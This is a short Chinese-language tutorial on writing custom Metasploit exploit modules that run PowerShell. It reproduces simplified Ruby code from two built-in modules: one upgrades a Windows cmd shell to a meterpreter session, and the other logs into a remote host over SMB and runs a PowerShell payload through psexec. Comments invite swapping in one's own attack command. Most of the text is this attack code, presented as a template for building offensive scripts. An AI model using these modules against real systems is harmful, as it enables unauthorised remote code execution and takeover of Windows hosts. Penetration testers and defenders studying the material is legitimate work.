Use Powershell in Metasploit Exploit

  1. 0x01 exploit/windows/local/powershell_cmd_upgrade
  2. 0x02 exploit/windows/smb/psexec_psh
  3. 0x03 参考

author: Dlive

这篇文章主要是记录如何编写自己的使用Powershell进行攻击的Metasploit脚本

和编写SQLmap Tamper的方法类似,编写自己的脚本最快的方式就是参考Metasploit内置的脚本是如何编写的

这里主要参考两个脚本,分别是在本地执行Powershell命令(powershell_cmd_upgrade )

和在远程主机执行Powershell命令(psexec_psh)

0x01 exploit/windows/local/powershell_cmd_upgrade

这个脚本的功能是将使用powershell将cmd shell升级为meterpreter

脚本的代码如下,删掉一些错误处理代码和一些描述信息,主要功能的代码就很简单了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
require 'msf/core/exploit/powershell'


class MetasploitModule < Msf::Exploit::Local

Rank = ExcellentRanking

include Exploit::Powershell

include Post::File

def initialize(info={})

# 描述信息直接删掉了

end

def exploit

# psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"

#if file? "%WINDIR%\\System32#{psh_path}"

print_status("Executing powershell command line...")

# 这里的command直接换成自己的powershell命令就行了

command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)

cmd_exec(command)

#else

#fail_with(Failure::NotVulnerable, "No powershell available.")

#end
end

end

0x02 exploit/windows/smb/psexec_psh

这个脚本的功能是通过psexec在远程主机上执行powershell命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Remote

Rank = ManualRanking

# Exploit mixins should be called first

include Msf::Exploit::Remote::SMB::Client::Psexec

include Msf::Exploit::Powershell

def initialize(info = {})

# 删除描述信息

end

def exploit

# 这里的command直接换成自己的powershell命令就行了

command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)

# Try and authenticate with given credentials

if connect

begin

smb_login

end

# Execute the powershell command

print_status("Executing the payload...")

begin

return psexec(command)

ensure

disconnect

end

end

end

0x03 参考

  1. Rapid7 - How to use Powershell in an exploit

https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Powershell-in-an-exploit